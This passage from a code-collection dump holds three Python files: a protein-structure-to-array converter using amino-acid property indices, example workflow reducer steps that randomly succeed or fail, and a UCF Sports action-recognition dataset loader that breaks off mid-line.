21.4,\r\n}\r\nAA_FLEXIBILITY_INDEX = {\r\n 'ARG': 2.6,\r\n 'LYS': 1.9,\r\n 'ASN': 14.,\r\n 'ASP': 12.,\r\n 'GLN': 4.8,\r\n 'GLU': 5.4,\r\n 'HIS': 4.,\r\n 'PRO': 0.05,\r\n 'TYR': 0.05,\r\n 'TRP': 0.05,\r\n 'SER': 19.,\r\n 'THR': 9.3,\r\n 'GLY': 23.,\r\n 'ALA': 14.,\r\n 'MET': 0.05,\r\n 'CYS': 0.05,\r\n 'PHE': 7.5,\r\n 'LEU': 5.1,\r\n 'VAL': 2.6,\r\n 'ILE': 1.6,\r\n}\r\nAMINO_ACID_NUMBERS = {}\r\nif args.aminoacid_message:\r\n for aa in AMINO_ACIDS:\r\n AMINO_ACID_NUMBERS.update({aa: [(5.5-AA_HYDROPATHICITY_INDEX[aa]) / 10 * 255.,\r\n AA_BULKINESS_INDEX[aa] / 21.67 * 255.,\r\n (25.-AA_FLEXIBILITY_INDEX[aa]) / 25. * 255.]})\r\nelse:\r\n for aa in AMINO_ACIDS:\r\n AMINO_ACID_NUMBERS.update({aa: [1.]})\r\nary_dim = 2 + len(AMINO_ACID_NUMBERS[AMINO_ACIDS[0]])\r\n\r\n\r\nclass Atom(object):\r\n def __init__(self, aminoacid, index, x, y, z, atom_type='CA', element='C'):\r\n self.index = int(index)\r\n self.aa = aminoacid\r\n self.x = float(x)\r\n self.y = float(y)\r\n self.z = float(z)\r\n self.type = atom_type\r\n self.element = element\r\n\r\n\r\ndef readfile(filename, path):\r\n file = open(path + '/' + filename, 'r')\r\n if os.path.splitext(filename)[1] == '.cif' or os.path.splitext(filename)[1]=='.pdb':\r\n message = file.readlines()\r\n return message\r\n\r\n file.close()\r\n\r\n\r\n\r\ndef extract_cif(cif_message):\r\n atoms = []\r\n for line in cif_message:\r\n line = line.split()\r\n if line[3] in ['CA', 'C', 'N']:\r\n atoms.append(Atom(line[5], line[8], line[10],\r\n line[11], line[12], line[3], line[2]))\r\n return atoms\r\n\r\n\r\ndef extract_ca_cif(cif_message):\r\n atoms = []\r\n for line in cif_message:\r\n line = line.split()\r\n if line[3] == 'CA':\r\n atoms.append(Atom(line[5], line[8], line[10], line[11], line[12]))\r\n return atoms\r\n\r\n\r\ndef extract_pdb(pdb_message):\r\n atoms = []\r\n for line in pdb_message:\r\n if line[13:15] in ['N ', 'CA', 'C ']:\r\n atoms.append(Atom(line[17:20], line[13:16], line[30:38],\r\n line[38:46], line[46:54], line[13:16], line[77]))\r\n return atoms\r\n\r\n\r\ndef extract_ca_pdb(pdb_message):\r\n atoms = []\r\n for line in pdb_message:\r\n if line[13:15] == 'CA':\r\n atoms.append(Atom(line[17:20], line[13:16], line[30:38], line[38:46], line[46:54]))\r\n return atoms\r\n\r\n\r\ndef extract_message(message, message_type):\r\n if message_type == 'pdb':\r\n if args.multi_atom:\r\n return extract_pdb(message)\r\n else:\r\n return extract_ca_pdb(message)\r\n elif message_type == 'cif':\r\n if args.multi_atom:\r\n return extract_cif(message)\r\n else:\r\n return extract_ca_cif(message)\r\n\r\n\r\ndef find_head(atoms):\r\n for atom in atoms:\r\n if atom.type == 'CA':\r\n return atom\r\n\r\n\r\ndef find_tail(atoms):\r\n for i in range(1, len(atoms)+1):\r\n if atoms[-i].type == 'CA':\r\n return atoms[-i]\r\n\r\n\r\ndef rotation_axis(head):\r\n x = head.x\r\n y = head.y\r\n z = head.z\r\n c = ((y - x) ** 2 /\r\n ((y * res * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5 / ar - z) ** 2\r\n + (x * res * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5 / ar - z) ** 2\r\n + (y - x) ** 2)\r\n ) ** 0.5\r\n a = (y * res * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5 / ar - z) / (x - y) * c\r\n b = (x * res * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5 / ar - z) / (y - x) * c\r\n return [(a, b, c), (-a, -b, -c)] # 转轴\r\n\r\n\r\ndef rotation_angle(head):\r\n x = head.x\r\n y = head.y\r\n z = head.z\r\n return math.acos(\r\n ((x + y) * s + z * (x ** 2 + y ** 2 + z ** 2 - 2 * s ** 2) ** 0.5) /\r\n (x ** 2 + y ** 2 + z ** 2)\r\n ) # 转角\r\n\r\n\r\ndef rotation(u, v, w, t, axis): # 原始坐标\r\n (a, b, c) = axis\r\n # 罗德里格旋转公式:\r\n rx = u*math.cos(t)+(b*w-c*v)*math.sin(t)+a*(a*u+b*v+c*w)*(1-math.cos(t))\r\n ry = v*math.cos(t)+(c*u-a*w)*math.sin(t)+b*(a*u+b*v+c*w)*(1-math.cos(t))\r\n rz = w*math.cos(t)+(a*v-b*u)*math.sin(t)+c*(a*u+b*v+c*w)*(1-math.cos(t))\r\n return rx, ry, rz # 旋转所得坐标\r\n\r\n\r\ndef relocate(atoms):\r\n head = find_head(atoms)\r\n tail = find_tail(atoms)\r\n x_o = (head.x + tail.x) / 2\r\n y_o = (head.y + tail.y) / 2\r\n z_o = (head.z + tail.z) / 2\r\n for atom in atoms:\r\n atom.x -= x_o\r\n atom.y -= y_o\r\n atom.z -= z_o\r\n vs = rotation_axis(head)\r\n t = rotation_angle(head)\r\n atom_v = []\r\n for v in vs:\r\n atom_v.append(rotation(head.x, head.y, head.z, t, v))\r\n if abs(atom_v[0][0] - s) + abs(atom_v[0][1] - s) < abs(atom_v[1][0] - s) + abs(atom_v[1][1] - s):\r\n for atom in atoms:\r\n (atom.x, atom.y, atom.z) = rotation(atom.x, atom.y, atom.z, t, vs[0])\r\n else:\r\n for atom in atoms:\r\n (atom.x, atom.y, atom.z) = rotation(atom.x, atom.y, atom.z, t, vs[1])\r\n return atoms\r\n\r\n\r\ndef move2center(atoms):\r\n coordinates = []\r\n for atom in atoms:\r\n if atom.type == 'CA':\r\n coordinates.append([atom.x, atom.y, atom.z])\r\n coordinates = np.array(coordinates)\r\n center = tf.Variable(tf.zeros([1, 3]))\r\n distances = coordinates-center\r\n loss = tf.reduce_mean(tf.sqrt(tf.reduce_sum(tf.square(distances), 1)))\r\n optimizer = tf.train.GradientDescentOptimizer(0.5)\r\n train = optimizer.minimize(loss)\r\n init = tf.global_variables_initializer()\r\n sess = tf.Session()\r\n sess.run(init)\r\n losses = []\r\n for step in range(10):\r\n sess.run(train)\r\n losses.append(sess.run(loss))\r\n while losses[-1] != losses[-5]:\r\n sess.run(train)\r\n losses.append(sess.run(loss))\r\n final_center = sess.run(center)[0]\r\n for atom in atoms:\r\n atom.x -= final_center[0]\r\n atom.y -= final_center[1]\r\n atom.z -= final_center[2]\r\n tf.reset_default_graph()\r\n return atoms\r\n\r\n\r\ndef sign(x):\r\n if x < 0:\r\n return -1\r\n else:\r\n return 1\r\n\r\n\r\ndef close_neibor(array, x_ary, y_ary, dot, dis_x, dis_y, rec):\r\n x_step = sign(dis_x)\r\n y_step = sign(dis_y)\r\n if abs(dis_x) < abs(dis_y):\r\n neibors = [(0, y_step), (x_step, 0), (x_step, y_step), (-x_step, 0),\r\n (0, -y_step), (-x_step, y_step), (x_step, -y_step), (-x_step, -y_step)]\r\n else:\r\n neibors = [(x_step, 0), (0, y_step), (x_step, y_step), (0, -y_step),\r\n (-x_step, 0), (x_step, -y_step), (-x_step, y_step), (-x_step, -y_step)]\r\n step = 1\r\n while True:\r\n for (i, j) in neibors:\r\n try:\r\n if array[x_ary + i * step, y_ary + j * step, 2] == 0:\r\n array[x_ary + i * step, y_ary + j * step] = [dot.z, dot.index] + AMINO_ACID_NUMBERS.get(dot.aa)\r\n rec.update({(x_ary + i * step, y_ary + j * step): dot})\r\n # print('dot%d:%d,%d->%d,%d'%(dot[6],x,y,x+i*step,y+j*step))\r\n return array\r\n except IndexError:\r\n print('dot(%d+%d,%d+%d) is out of the edge' % (x_ary, i * step, y_ary, j * step))\r\n # print('%d step neibor of dot%d(%d,%d) is full!'%(step,dot_i,x,y))\r\n step += 1\r\n\r\n\r\ndef lattice_battle(array, x_ary, y_ary, dot1, dot2, rec): # dot1 is original; dot2 is new\r\n dis1_x = dot1.x / (2 * s) % 1 - 0.5\r\n dis1_y = dot1.y / (2 * s) % 1 - 0.5\r\n dis2_x = dot2.x / (2 * s) % 1 - 0.5\r\n dis2_y = dot2.y / (2 * s) % 1 - 0.5\r\n if dis1_x ** 2 + dis1_y ** 2 > dis2_x ** 2 + dis2_y ** 2:\r\n # print('%d / %d swap!'%(dot1[6],dot2[6]))\r\n array = close_neibor(array, x_ary, y_ary, dot1, dis1_x, dis1_y, rec)\r\n array[x_ary, y_ary] = [dot2.z, dot2.index] + AMINO_ACID_NUMBERS[dot2.aa]\r\n rec.update({(x_ary, y_ary) : dot2})\r\n else:\r\n array = close_neibor(array, x_ary, y_ary, dot2, dis2_x, dis2_y, rec)\r\n return array\r\n\r\n\r\ndef draw_atom(x, y, dot, array, rec):\r\n if array[x, y, -1] == 0:\r\n array[x, y] = [dot.z, dot.index] + AMINO_ACID_NUMBERS[dot.aa]\r\n rec.update({(x, y): dot})\r\n\r\n\r\ndef arraylize(atoms, array_dim):\r\n array = np.zeros([res, res, array_dim], dtype=float, order='C')\r\n rec = {} # atoms record\r\n for atom in atoms:\r\n x_ary = int((atom.x + ar) // (2 * s))\r\n y_ary = int((atom.y + ar) // (2 * s))\r\n if rec.get((x_ary, y_ary)):\r\n array = lattice_battle(array, x_ary, y_ary, rec[(x_ary, y_ary)], atom, rec)\r\n else:\r\n draw_atom(x_ary, y_ary, atom, array, rec)\r\n return array, rec\r\n\r\n\r\n# def values_sta(path):\r\n# xs = []\r\n# ys = []\r\n# for filename in os.listdir(path):\r\n# atoms = move2center(relocate(extract_cif(readfile(filename, path))))\r\n# for atom in atoms:\r\n# xs.append(atom.x)\r\n# ys.append(atom.y)\r\n# return xs, ys\r\n\r\n\r\ndef normal_dis(values, var, coefficient):\r\n dis = []\r\n values.sort()\r\n mark = 0\r\n idx = 0\r\n for i in range(res):\r\n cut_point = nm.ppf((i + 1) / res, 0, var**0.5 * coefficient)\r\n if idx == len(values):\r\n dis.append([])\r\n mark = int(idx)\r\n else:\r\n while values[idx] < cut_point:\r\n idx += 1\r\n if idx == len(values):\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n break\r\n else:\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n return dis\r\n\r\n\r\n# def redistribute():\r\n\r\n\r\ndef visual_values_dis(values):\r\n mark = 0\r\n idx = 0\r\n dis = []\r\n dis_count = []\r\n axis_length = 2*ar\r\n for i in range(1, res+1):\r\n cut_point = (i-res/2)*axis_length/res\r\n if idx == len(values):\r\n dis.append([])\r\n else:\r\n while values[idx] < cut_point:\r\n idx += 1\r\n if idx == len(values):\r\n dis.append(values[mark:idx])\r\n break\r\n else:\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n for i in range(res):\r\n dis_count.append(len(dis[i]))\r\n plt.bar(range(res), dis_count)\r\n plt.show()\r\n\r\n\r\ndef vis_normal_dis(values, var, coefficient):\r\n dis = []\r\n values.sort()\r\n mark = 0\r\n idx = 0\r\n dis_count = []\r\n for i in range(res):\r\n cut_point = nm.ppf((i+1)/res, 0, var**0.5*coefficient)\r\n if idx == len(values):\r\n dis.append([])\r\n mark = int(idx)\r\n else:\r\n while values[idx] < cut_point:\r\n idx += 1\r\n if idx == len(values):\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n break\r\n else:\r\n dis.append(values[mark:idx])\r\n mark = int(idx)\r\n dis_count.append(len(dis[i]))\r\n plt.bar(range(res), dis_count)\r\n plt.show()\r\n\r\n\r\ndef draw_dot(x, y, dot1, z_add, idx_add, array):\r\n if array[x, y, 2] == 0:\r\n array[x, y] = [dot1.z + z_add, dot1.index + idx_add, 0, 0, 0]\r\n\r\n\r\ndef dots_connection(dot1, dot2, array, site):\r\n x = site[dot1][0]\r\n y = site[dot1][1]\r\n z_s = dot2.z - dot1.z\r\n x_r = sign(site[dot2][0] - x)\r\n y_r = sign(site[dot2][1] - y)\r\n x_s = abs(site[dot2][0] - x)\r\n y_s = abs(site[dot2][1] - y)\r\n dis_c = max(x_s, y_s)+1\r\n if x_s + y_s > 2:\r\n for i in range(max(x_s, y_s)):\r\n l = i + 1\r\n if min(x_s, y_s) <= 1:\r\n if x_s > y_s:\r\n draw_dot(x + l*x_r, y, dot1, z_s*l/dis_c, l/dis_c, array)\r\n else:\r\n draw_dot(x, y + l*y_r, dot1, z_s*l/dis_c, l/dis_c, array)\r\n else:\r\n t = max(x_s, y_s) // min(x_s, y_s)\r\n remainder = max(x_s, y_s) % min(x_s, y_s)\r\n if x_s > y_s:\r\n j = [l, i//t, l, y_s]\r\n else:\r\n j = [i//t, l, x_s, l]\r\n if i < max(x_s, y_s) - remainder:\r\n draw_dot(x + j[0] * x_r, y + j[1] * y_r, dot1, z_s*l/dis_c, l/dis_c, array)\r\n else:\r\n draw_dot(x + j[2] * x_r, y + j[3] * y_r, dot1, z_s*l/dis_c, l/dis_c, array)\r\n\r\n\r\ndef draw_connection(atoms, array, rec):\r\n site = {}\r\n for (x, y) in rec.keys():\r\n site.update({rec[(x, y)]: [x, y]})\r\n for i in range(len(atoms) - 1):\r\n dots_connection(atoms[i], atoms[i + 1], array, site)\r\n\r\n\r\ndef write_log(path):\r\n arg_name_list = ['dataset', 'resolution', 'input_type', 'output_type', 'axis_range', 'multi_atom',\r\n 'move2center', 'redistribute', 'redistribute_rate', 'relative_number', 'draw_connection',\r\n 'aminoacid_message']\r\n arg_list = [args.dataset, args.resolution, args.input_type, args.output_type, args.axis_range, args.multi_atom,\r\n args.move2center, args.redistribute, args.redistribute_rate, args.relative_number, args.draw_connection,\r\n args.aminoacid_message]\r\n write_list = [time.strftime(\"%Y%m%d_%H%M\", time.localtime())]\r\n for i in range(len(arg_name_list)):\r\n print(\"%s = %s\" % (arg_name_list[i], str(arg_list[i])))\r\n write_list.append(\"%s = %s\" % (arg_name_list[i], str(arg_list[i])))\r\n write_list.append('\\n\\n\\n')\r\n with open(path + '/args_log.txt', 'a') as log_writer:\r\n log_writer.write('\\n'.join(write_list))\r\n\r\n\r\ndef process():\r\n log_dir = args.output_path + '/' + args.dataset\r\n output_dir = args.output_path + '/' + args.dataset + '/' + time.strftime(\"%Y%m%d_%H%M\", time.localtime())\r\n pathlib.Path(output_dir).mkdir(parents=True, exist_ok=True)\r\n write_log(log_dir)\r\n num = 0\r\n if args.output_type == 'image':\r\n if args.redistribute:\r\n atoms_dic = {}\r\n xs = []\r\n ys = []\r\n for filename in os.listdir(input_folder):\r\n atoms = relocate(extract_message(readfile(filename, input_folder), args.input_type))\r\n if args.move2center:\r\n atoms = move2center(atoms)\r\n for atom in atoms:\r\n xs.append(atom.x)\r\n ys.append(atom.y)\r\n atoms_dic.update({filename: atoms})\r\n # var_sta = max(np.var(xs), np.var(ys))\r\n else:\r\n for filename in os.listdir(input_folder):\r\n atoms = relocate(extract_message(readfile(filename, input_folder), args.input_type))\r\n if args.move2center:\r\n atoms = move2center(atoms)\r\n for i in range(len(atoms)):\r\n atoms[i].z=(atoms[i].z+64.)*2.-2.\r\n if args.draw_connection:\r\n array, rec = arraylize(atoms, ary_dim)\r\n draw_connection(atoms, array, rec)\r\n else:\r\n array, _ = arraylize(atoms, ary_dim)\r\n if args.relative_number:\r\n array[:, :, 1] /= (len(atoms) + 1)\r\n output_name = filename.replace('.cif', '.npy')\r\n\r\n np.save(output_dir + '/' + output_name, array)\r\n # break\r\n # matplotlib.image.imsave(output_dir + '/' + output_name.replace('.npy', '.png'), array)\r\n # num += 1\r\n # if num == 10:\r\n # break\r\n elif args.output_type == 'distance_map':\r\n if args.multi_atom:\r\n for filename in os.listdir(input_folder):\r\n atoms = extract_message(readfile(filename, input_folder), args.input_type)\r\n\r\n\r\nif __name__ == '__main__':\r\n print('Parent process %s.' % os.getpid())\r\n p = Pool(3)\r\n p.apply_async(process())\r\n print('Waiting for all subprocesses done...')\r\n p.close()\r\n p.join()\r\n print('All subprocesses done.')\r\n\r\n","repo_name":"ElvinJun/DeepPBS","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":19477,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"41887868107","text":"from random import random\nfrom time import sleep\n\nimport logging\nlog = logging.getLogger(__name__)\n\nfrom freactor import Freactor, StatusCode, freducer\n\nSUCCESS = StatusCode.SUCCESS\nFAILURE = StatusCode.FAILURE\nRETRY = StatusCode.RETRY\nABORT = StatusCode.ABORT\n\n@freducer(3, 1)\ndef s1(t_data):\n log.info('s1 running...')\n log.info(t_data)\n sleep(1)\n r = random()\n if r < 0.9:\n return StatusCode.SUCCESS, {'s1': 1}, 's1 general success'\n else:\n return StatusCode.ABORT, {'s1': 1}, 's1 fail, abort'\n\n\n@freducer()\ndef s2(t_data): # cleanup step of s1\n log.info('s2 running...')\n log.info(t_data)\n sleep(1)\n r = random()\n if r < 0.9:\n return StatusCode.SUCCESS, {'s2': 2}, 's2 general success'\n else:\n raise Exception('Woo! s2 raised!')\n\n\n@freducer(3, 1)\ndef s3(t_data):\n log.info('s3 running...')\n log.info(t_data)\n sleep(1)\n r = random()\n if r < 0.3:\n return StatusCode.SUCCESS, {'s3': 1}, 's3 general success'\n else:\n raise Exception('Woo! s3 raised!')\n\n\n@freducer()\ndef s4(t_data): # cleanup step of s3\n log.info('s4 running...')\n log.info(t_data)\n sleep(1)\n r = random()\n if r < 0.9:\n return StatusCode.SUCCESS, {'s4': 4}, 's4 general success'\n else:\n raise Exception('Woo! s4 raised!')\n\n\n@freducer()\ndef s5(t_data):\n log.info('s5 running...')\n log.info(t_data)\n sleep(1)\n r = random()\n if r < 0.2:\n return StatusCode.SUCCESS, {'s5': 5}, 's5 general success'\n else:\n raise Exception('Woo! s5 raised!')\n\n","repo_name":"Pro-YY/freactor","sub_path":"examples/example-reducers/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"41978814312","text":"\n#import datasets\nimport os\nfrom numpy.random import randint\nimport random\nimport numpy as np\nimport cv2 \n\nfrom cv2 import imread\nimport torch.utils.data\nfrom torch.utils.data import Dataset\n\nact2id = {\n \"BG\": 0, # background\n \"Diving\": 1,\n \"Golf\": 2,\n \"Kicking\": 3,\n \"Lifting\": 4,\n \"Riding\": 5,\n \"Run\":6,\n \"SkateBoarding\":7,\n \"Swing1\":8,\n \"Swing2\":9,\n \"Walk\":10\n}\n\n\n\nclass VideoRecord(object):\n def __init__(self, row):\n self._data = row\n\n @property\n def path(self):\n return self._data[0]\n\n @property\n def num_frames(self):\n return int(self._data[1])\n \n @property\n def labels(self):\n return self._data[2]\n\nclass ucfsports(Dataset):\n def __init__(self,cfg, image_set, PHASE = 'train',num_segments = 8,interval = 3,dense_sample = False,\n uniform_sample=True,random_sample = False,strided_sample = False, is_input_sampling = True,\n pathway ='two_pathway',transform= None):\n \n self.cfg = cfg\n self.interval = interval\n self.pathway = pathway\n self.num_segments = num_segments\n self.dense_sample = dense_sample\n self.uniform_sample = uniform_sample\n self.random_sample= random_sample\n self.strided_sample = strided_sample\n self.is_input_sampling = is_input_sampling\n self.num_classes = cfg.UCFSPORT.NUM_CLASSES\n self.framelist = cfg.UCFSPORT.FRAME_LIST_DIR\n self.transform = transform\n \n if PHASE=='train':\n self.list_file = self.framelist + 'train_list.txt' # you need a full path for image list and data path\n else:\n self.list_file = self.framelist + 'test_list.txt'\n\n self._annot_path = cfg.UCFSPORT.ANNOTATION_DIR # you only have annotations in RGB data folder\n self._data_path = cfg.UCFSPORT.FRAME_DIR\n self._classes = ('__background__', \n 'Diving', 'Golf', 'Kicking', 'Lifting', 'Riding', \n 'Run', 'SkateBoarding', 'Swing1', 'Swing2', 'Walk')\n\n self._class_to_ind = dict(zip(self._classes, range(self.num_classes)))\n self._parse_list()\n \n def _parse_list(self):\n \"\"\"\n Parse the video info from the list file\n \"\"\"\n frame_path = [x.strip().split(' ') for x in open(self.list_file)] \n self.video_list = [VideoRecord(item) for item in frame_path]\n print('Sequence number/ video number:%d' % (len(self.video_list)))\n \n def _sample_indices(self, record):\n \"\"\"\n :param record: VideoRecord\n :return: list\n \"\"\"\n if self.dense_sample: # i3d dense sample\n sample_pos = max(1, 1 + record.num_frames - 64)\n t_stride = 64 // self.num_segments\n start_idx = 0 if sample_pos == 1 else np.random.randint(0, sample_pos - 1)\n offsets = [(idx * t_stride + start_idx) % record.num_frames for idx in range(self.num_segments)]\n return np.array(offsets)+1\n elif self.uniform_sample: # normal sample\n average_duration = (record.num_frames) // self.num_segments\n if self.pathway == \"two_pathway\":\n if record.num_frames < 80:\n offsets = np.multiply(list(range(self.num_segments)), average_duration)+average_duration\n assert offsets[-1] <= record.num_frames\n return offsets\n else:\n mid_frame_ind = record.num_frames // 2\n offsets = list(range(mid_frame_ind - 12, mid_frame_ind + 12, 3))\n return offsets\n else:\n if average_duration > 0:\n offsets = np.multiply(list(range(self.num_segments)), average_duration) + randint(average_duration,\n size=self.num_segments)\n return offsets+1\n\n elif self.random_sample:\n offsets = np.sort(randint(record.num_frames + 1, size=self.num_segments))\n return offsets+1 \n elif self.strided_sample:\n average_duration = (record.num_frames) // self.num_segments\n if average_duration > 0:\n offsets = np.multiply(list(range(self.num_segments)), average_duration) + average_duration//2\n return offsets+1\n else:\n offsets = np.zeros((self.num_segments,)) \n return offsets+1 \n \n def get_all_frames(self,index,record):\n #initialise the gt,num_boxes,im_info and one hot labels\n gt = np.zeros((self.num_segments,self.cfg.MAX_NUM_GT_BOXES,(self.num_classes + 4)),\n dtype=np.float32)\n num_boxes = np.ones((self.num_segments),dtype=np.float32)\n im_info = np.zeros((self.num_segments,3),dtype=np.float32)\n one_hot_labels = np.zeros((self.num_classes),dtype = np.float)\n count = 0 #to traverse between the segments\n\n #get the imageindex and labels from the framelist \n im_split = (record.path).split('/')\n num_parts = len(im_split)\n im_ind = int(im_split[num_parts-1][0:6])\n\n #get the class label and convert to one hot\n class_label_id = act2id[record.labels]\n one_hot_labels[class_label_id] = 1\n \n #annotation file and image folder to get the clips\n ann_file =self._annot_path +im_split[5]+ '.txt'\n Lines = open(ann_file, 'r').readlines()\n img_folder = os.path.join(self._data_path, im_split[5])\n max_num = len(os.listdir(img_folder)) - 1\n \n clip = []\n\n d = self.interval\n path = []\n for i in reversed(range(self.num_segments)):\n # make it as a loop\n i_temp = im_ind - i * d\n while i_temp < 1:\n i_temp = max_num + i_temp\n while i_temp > max_num:\n i_temp = i_temp - max_num\n path.append(i_temp)\n \n #prepare the image/frame\n path_tmp = self._data_path + '/'+im_split[5]+'/'+('{:06d}.jpg'.format(i_temp))\n #print(\"image split0:{0} imagesplit1: {1} frameindex: {2}\\n\".format(im_split[0], im_split[1] ,'{:05d}.png'.format(i_temp)))\n #print(\"maximum_frames : {}\".format(max_num))\n #print(path_tmp)\n im = imread(path_tmp)\n if im is None:\n print(\"caught\")\n im = im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / height\n im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / width\n im_info[count,:]=im.shape[0],im.shape[1],im_scale\n \n #prepare the gt boxes \n if len(Lines[0].split()) == 5:\n # gt boxes and labels per image\n x,y,w,h = [line.strip().split()[1:] for line in Lines if int((str(line).split())[0]) == im_ind][0]\n x2 = int(x)+ int(w)\n y2 = int(y) + int(h)\n y,y2 = int(y)*im_scale1,y2*im_scale1\n x,x2 = int(x)*im_scale2,x2*im_scale2\n gt[count,0,:4] = int(x),int(y),x2,y2\n gt[count,0,4:] = one_hot_labels\n else : \n data1 =[(line.split())[1:5] for line in Lines if int((str(line).split())[0]) == im_ind][0]\n xf,yf,wf,hf = [int(tup) for tup in data1]\n data2 =[(line.split())[5:] for line in Lines if int((str(line).split())[0]) == im_ind][0]\n xs,ys,ws,hs = [int(tup) for tup in data2]\n gt[count,0,:4]= xf*im_scale2,yf*im_scale1,(wf+xf)*im_scale2,(yf+hf)*im_scale1\n gt[count,1,:4]= xs*im_scale2,ys*im_scale1,(ws+xs)*im_scale2,(ys+hs)*im_scale1\n num_boxes[count] *= 2\n gt[count,:,4:] = one_hot_labels\n #gt[count,:,:4] = gt[count,:,:4]*im_scale\n count += 1\n clip.append(im)\n \n max_shape = np.array([imz.shape for imz in clip]).max(axis=0)\n blob = np.zeros((len(clip), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(clip)):\n blob[i,0:clip[i].shape[0], 0:clip[i].shape[1], :] = clip[i]\n\n process_data = self.transform(blob)\n return process_data,gt,num_boxes,im_info\n \n \n\n #def get(self,index,record,indices,num_segments):\n def get_input_keyframe(self,record,indices):\n \"\"\"\n Extract the gt boxes,labels from the file list\n \"\"\"\n video_id = str(record.path).strip().split('/Frames/')[1]\n ann_file = self._annot_path + video_id +'.txt' \n \n \n gt = np.zeros((self.num_segments,self.cfg.MAX_NUM_GT_BOXES,(self.num_classes + 4)),\n dtype=np.float32)\n num_boxes = np.ones((self.num_segments),dtype=np.float32)\n im_info = np.zeros((self.num_segments,3),dtype=np.float32)\n \n one_hot_labels = np.zeros((self.num_classes),dtype = np.float)\n count = 0\n images =[]\n\n labels = open(self.list_file, 'r').readlines()\n class_label =self._class_to_ind[([label.split()[2] for label in labels if label.split()[0].split('/Frames/')[1] == video_id])[0]]\n one_hot_labels[class_label] = 1\n Lines = open(ann_file, 'r').readlines() \n \n for seg_ind in indices:\n\n #image information \n image_path = os.path.join(record.path, '{:06d}.jpg'.format(seg_ind))\n im = imread(image_path)\n im = im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_size_min= min(height,width)\n im_size_max=max(height,width)\n #im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(im_size_min)\n #im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / float(im_size_max)\n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / height\n im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / width\n \n #im = cv2.resize(im, None, None, fx=im_scale1, fy=im_scale2,\n # interpolation=cv2.INTER_LINEAR)\n im_info[count,:]=self.cfg.TRAIN.TRIM_HEIGHT,len(im[2]),im_scale\n if len(Lines[0].split()) == 5:\n # gt boxes and labels per image\n x,y,w,h = [line.strip().split()[1:] for line in Lines if int((str(line).split())[0]) == seg_ind][0]\n x2 = int(x)+ int(w)\n y2 = int(y) + int(h)\n y,y2 = int(y)*im_scale1,y2*im_scale1\n x,x2 = int(x)*im_scale2,x2*im_scale2\n gt[count,0,:4] = int(x),int(y),x2,y2\n gt[count,0,4:] = one_hot_labels\n else : \n data1 =[(line.split())[1:5] for line in Lines if int((str(line).split())[0]) == seg_ind][0]\n xf,yf,wf,hf = [int(tup) for tup in data1]\n data2 =[(line.split())[5:] for line in Lines if int((str(line).split())[0]) == seg_ind][0]\n xs,ys,ws,hs = [int(tup) for tup in data2]\n gt[count,0,:4]= xf*im_scale2,yf*im_scale1,(wf+xf)*im_scale2,(yf+hf)*im_scale1\n gt[count,1,:4]= xs*im_scale2,ys*im_scale1,(ws+xs)*im_scale2,(ys+hs)*im_scale1\n num_boxes[count] *= 2\n gt[count,:,4:] = one_hot_labels\n #gt[count,:,:4] = gt[count,:,:4]*im_scale\n count += 1\n images.append(im)\n \n \n max_shape = np.array([imz.shape for imz in images]).max(axis=0)\n blob = np.zeros((len(images), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(images)):\n blob[i,0:images[i].shape[0], 0:images[i].shape[1], :] = images[i]\n\n process_data = self.transform(blob)\n return process_data,gt,num_boxes,im_info\n \n def __getitem__(self, index):\n record = self.video_list[index]\n #self.yaml_file(index)\n segment_indices = self._sample_indices(record)\n segment_indices = np.sort(segment_indices)\n '''Changes made here for slowfast'''\n if self.pathway == 'two_pathway':\n segment_adj_indices = self.get_adj_frames(record,segment_indices)\n #\n return self.two_branch_input(record,segment_indices,segment_adj_indices)\n else:\n return self.get_input_keyframe(record,segment_indices)\n\n def two_branch_input(self,record,segment_indices,segment_adj_indices):\n two_branch_list =[]\n two_branch_list.append(self.get_input_keyframe(record,segment_indices))\n two_branch_list.append(self.get_input_adjframe(record,segment_adj_indices))\n return two_branch_list\n \n def get_input_adjframe(self,record,indices):\n \"\"\"\n Extract the gt boxes,labels from the file list\n \"\"\"\n video_id = str(record.path).strip().split('/Frames/')[1]\n images =[]\n\n for seg_ind in indices:\n\n #image information \n image_path = os.path.join(record.path, '{:06d}.jpg'.format(seg_ind))\n im = imread(image_path)\n im = im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_size_min= min(height,width)\n im_size_max=max(height,width)\n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n images.append(im)\n \n \n max_shape = np.array([imz.shape for 